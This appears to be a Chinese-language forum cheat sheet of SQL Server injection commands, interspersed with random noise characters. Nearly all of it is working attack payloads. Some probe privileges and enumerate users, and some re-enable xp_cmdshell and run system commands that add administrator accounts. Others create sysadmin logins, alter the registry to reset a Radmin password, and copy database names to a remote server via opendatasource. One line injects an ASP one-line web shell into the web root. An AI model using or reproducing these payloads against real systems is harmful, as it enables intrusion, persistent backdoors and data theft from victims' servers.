常用的一些注入命令

admin

//看看是什么权限的
# u* ^5 D, G4 R. }- \and 1=(Select IS_MEMBER('db_owner'))
+ o: a+ k2 x* }And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--

4 {, U0 e: X& ]2 P//检测是否有读取某数据库的权限
; h  f7 y+ {. t& I, {% dand 1= (Select HAS_DBACCESS('master'))
% _# Z. w3 c0 i; g8 x+ HAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --

' {3 u* s3 E+ Q- ~; `2 E
6 O6 ?& G: M# z; J$ e数字类型
and char(124)%2Buser%2Bchar(124)=0

5 }2 [7 B5 `0 S# _4 y4 a字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='

; J2 f6 d% [" L/ u搜索类型
* p- t8 W( ~( `; L! O8 {' and char(124)%2Buser%2Bchar(124)=0 and '%'='

爆用户名
! Y  _+ P* A4 i) [2 B: ?8 _( [+ q% Nand user>0
% [2 s9 [+ u& N" v+ \3 @' and user>0 and ''='
3 Z% O  Z/ S! x6 z8 {' }0 [
检测是否为SA权限
6 a2 @' l. Q: g( Sand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

检测是不是MSSQL数据库
9 f  s( y, F% F% X1 [2 \9 e& }and exists (select * from sysobjects);--

检测是否支持多行
/ D  i: j- V4 l4 {# R# F;declare @d int;--
7 q0 D  O( j$ r1 _
恢复 xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--


select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')

//-----------------------
4 N( [' x4 m  O//       执行命令
6 W( ?2 b5 R! {+ g/ ]//-----------------------
* ~7 a# }! b% F4 Q. {" }首先开启沙盘模式：
; n+ p* b" @5 p( V& Oexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

  \: t) S0 N' ]3 ~2 W然后利用jet.oledb执行系统命令
% x: C8 @9 F# R0 Zselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

4 K$ {0 f; d7 }3 t. Y5 j执行命令
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
/ B* ]7 a# A" o/ {! @
6 L( m: ]2 b0 B0 ^2 Z# _EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'

3 k( D0 ^& r2 G0 w2 h! W判断xp_cmdshell扩展存储过程是否存在：
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
" T9 I3 @( H8 d7 t, @
2 }2 {/ _! m. ~9 `9 T8 ^$ F写注册表
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

9 R( i/ l' `9 I3 b3 LREG_SZ

读注册表
# F" p5 _" N/ M) ^2 d* Yexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
; z: `+ {# b) ?) u8 t
读取目录内容
2 U; `' x4 v$ e$ Iexec master..xp_dirtree 'c:\winnt\system32\',1,1
( e2 J# V+ g) ~3 p

$ A* D6 {* D5 M% T% S2 W数据库备份
backup database pubs to disk = 'c:\123.bak'
# N- s+ d3 i0 {. F5 z3 r' u1 y
//爆出长度
2 C) s9 X" L" N9 z# _3 @And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--


, ^2 P; e( _. [: G/ |7 o+ k
更改sa口令方法：用sql综合利用工具连接后，执行命令：
; g7 L& k& p: ^  V5 rexec sp_password NULL,'新密码','sa'

% c8 n; w! k" Y3 `4 q添加和删除一个SA权限的用户test：
exec master.dbo.sp_addlogin test,9530772
exec master.dbo.sp_addsrvrolemember test,sysadmin
' `; v3 U6 f& Z% l' X' k- T0 p
$ |1 C% N3 I& ?% t删除扩展存储过过程xp_cmdshell的语句:
) Z1 `4 m4 d$ v" bexec sp_dropextendedproc 'xp_cmdshell'
. G: |$ ?' h9 |; u0 L$ n/ i! M
6 f0 L# l0 ]7 ^' B* K5 f; y添加扩展存储过过程
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
6 N5 J0 d1 C1 m, _0 a" `* P" ?* uGRANT exec On xp_proxiedadata TO public
$ v  w. v. g7 r( T) @; l6 K0 A

停掉或激活某个服务。

( \% C2 N4 `* j1 P- _exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'

5 Q- T; A  A+ ?6 {7 L+ B* Odbo.xp_subdirs

( Y5 C3 b9 T+ D1 j6 E只列某个目录下的子目录。
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
9 _4 e8 l" @  B) `
0 r" a' d/ b6 R4 Adbo.xp_makecab
; q7 }- {% i: r+ A. V
9 T1 ]# ?+ z' `  U  _将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。
- _+ K6 \. `% o. F1 G. q
1 q; i: D% e  d' m7 u. Hdbo.xp_makecab
+ v, b4 A! P9 d+ w# n'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
) T. F; e6 t5 ?9 v, D3 {/ r'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

xp_terminate_process
( w6 B# O+ d  u8 K# P
停掉某个执行中的程序，但赋予的参数是 Process ID。
* F5 v: b5 p7 E利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID
5 G1 a/ L" T/ A
5 d! u( f, t) k5 dxp_terminate_process 2484

3 E- U: t; s6 r- `5 y9 Wxp_unpackcab

解开压缩档。

xp_unpackcab 'c:\test.cab','c:\temp',1


某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234

; J  I8 g, w9 h. ]create database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);
9 j0 l" C. ?+ _2 ]+ M1 a' B
//得到数据库名
9 l* O& M0 ]' B. b. z) k5 ~insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
, d, _* B6 L7 U# C/ |) `- i3 X0 y
1 j+ N* W4 A$ ~
//在Master中创建表，看看权限怎样
- m1 B' \  J( I) g$ DCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
7 W; |2 a$ T; }' ?* L+ ]0 A# G+ C8 Q
用 sp_makewebtask直接在web目录里写入一句话马：
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
4 q( S% e0 j: [' j1 L9 b
//更新表内容
Update films SET kind = 'Dramatic' Where id = 123
9 _* W( l9 z, k9 u$ P- z
//删除内容
6 |2 b3 ^! r: X" i8 i5 i! Jdelete from table_name where Stockid = 3